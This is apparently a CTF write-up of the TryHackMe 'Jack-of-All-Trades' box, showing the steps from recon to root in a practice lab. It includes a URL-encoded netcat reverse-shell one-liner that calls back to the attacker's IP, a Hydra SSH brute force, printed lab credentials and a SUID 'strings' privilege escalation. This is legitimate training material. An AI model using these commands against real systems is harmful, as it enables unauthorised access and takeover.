🎃Jack-of-All-Trades

Boot-to-root originally designed for Securi-Tay 2020

1.Reconnaisance

1.1 Nmap

Using nmap to scan and identify open ports and services

nmap -Pn -sC -sV 10.10.34.25                                   ✘ 255
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 20:45 IST
Nmap scan report for 10.10.34.25
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
80/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|   2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|   256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_  256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.28 seconds

• We find open ports 22 and 80 with http service and ssh running respectively (weird reversal)

2. Enumeration

• Going over to the webpage on port 22, we see a blog

• Inspecting the source code, we see a base64 encoded string as well as a mention of a directory /recovery.php in the comments

• Decoding the base64 string, we find a mention of a certain Johny Graves and his encoding systems as well as a password u?WtKSraq

echo "UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg==" | base64 -d
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq

• Going over to /recovery.php, find a login portal

• Viewing the source code, we find another string in the comments

• Not base64, maybe related to the encoding by Johny Graves mentioned above

• Googling Johny Graves, we can find a MySpace page related to the name where we find a post related to his favorite crypto method

• So we can try to decode is as mentioned in this; first base32, then hex and finally ROT13 the result to decode the text. We can use cyberchef to chain this

• It says Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S

• Going over to the link,it takes us to the Wikipedia page of stegosauria, the name gives us a hint of steganography.Also, there is a stegosaurus image in the homage of the blog

• We can download the image and use steghide to extract it. We can enter the passphrase u?WtKSraq obtained earlier.we get a file creds.txt.

• Viewing the file, we see that it is the wrong image

cat creds.txt 
Hehe. Gotcha!

You're on the right path, but wrong image!

• jackinthebox.jpg also does not give any results

• But header.jpg extracts a file cms.creds which give a username and password

cat cms.creds 
Here you go Jack. Good thing you thought ahead!

Username: jackinthebox
Password: TplFxiSHjY

jackinthebox : TplFxiSHjY

• We can use these credentials to log in to /recovery.php

• We can run any command by appending ?cmd=$cmd at the end of the URL

3. Gaining Access

• We can append a reverse shell on-liner from payloadsallthethings and URL encoding it : rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.11.66.165%204242%20%3E%2Ftmp%2Ff
• Stablizing the shell

nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.34.25] 33549
/bin/sh: 0: can't access tty; job control turned off

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@jack-of-all-trades:/var/www/html/nnxhweOV$ ^Z
[1]  + 3578 suspended  nc -lvnp 4242

~/De/Pentest/THM/jack_of_all_trades ❯ stty raw -echo;fg                                            ✘ TSTP 6s  
[1]  + 3578 continued  nc -lvnp 4242

www-data@jack-of-all-trades:/var/www/html/nnxhweOV$ 

• We can find a file jacks_password_list in the /home directory. Might be useful for brute forcing. Save it as pass.txt in the local machine

3.1 Hydra

• We can use hydra to brute force ssh password of jack

hydra -l jack -P pass.txt ssh://10.10.34.25:80
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-16 21:19:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.34.25:80/
[80][ssh] host: 10.10.34.25   login: jack   password: ITMJpGGIqg1jn?>@
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.

• We go the creds

  jack : ITMJpGGIqg1jn?>@

3.2 SSH

• SSHing as jack, we find an image user.jpg

ssh jack@10.10.34.25 -p 80                                     ✘ 255
The authenticity of host '[10.10.34.25]:80 ([10.10.34.25]:80)' can't be established.
ECDSA key fingerprint is SHA256:wABOsY4G6TIcuJ2bmAIpsoBGVR06p/QGP2J7tfiSy2s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.34.25]:80' (ECDSA) to the list of known hosts.
jack@10.10.34.25's password: 
jack@jack-of-all-trades:~$ ls
user.jpg

• Viewing the image gives us the user flag

3.3 SUID

• Finding a suid bit set file to escalate privileges

jack@jack-of-all-trades:~$ find / -perm -u=s -type f -ls 2>/dev/null
135127  456 -rwsr-xr-x   1 root     root       464904 Mar 22  2015 /usr/lib/openssh/ssh-keysign
134730  288 -rwsr-xr--   1 root     messagebus   294512 Feb  9  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135137   12 -rwsr-xr-x   1 root     root        10248 Apr 15  2015 /usr/lib/pt_chown
132828   44 -rwsr-xr-x   1 root     root        44464 Nov 20  2014 /usr/bin/chsh
132795   56 -rwsr-sr-x   1 daemon   daemon      55424 Sep 30  2014 /usr/bin/at
132826   56 -rwsr-xr-x   1 root     root        53616 Nov 20  2014 /usr/bin/chfn
133088   40 -rwsr-xr-x   1 root     root        39912 Nov 20  2014 /usr/bin/newgrp
133270   28 -rwsr-x---   1 root     dev         27536 Feb 25  2015 /usr/bin/strings
133273  148 -rwsr-xr-x   1 root     root       149568 Mar 12  2015 /usr/bin/sudo
133111   56 -rwsr-xr-x   1 root     root        54192 Nov 20  2014 /usr/bin/passwd
132940   76 -rwsr-xr-x   1 root     root        75376 Nov 20  2014 /usr/bin/gpasswd
133161   88 -rwsr-sr-x   1 root     mail        89248 Feb 11  2015 /usr/bin/procmail
138022 3052 -rwsr-xr-x   1 root     root      3124160 Feb 17  2015 /usr/sbin/exim4
    85   40 -rwsr-xr-x   1 root     root        40000 Mar 29  2015 /bin/mount
   131   28 -rwsr-xr-x   1 root     root        27416 Mar 29  2015 /bin/umount
   114   40 -rwsr-xr-x   1 root     root        40168 Nov 20  2014 /bin/su

• We find that /usr/bin/strings can run as root and can be used to read the root flag located in /root/root.txt

strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: securi-tay2020_{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}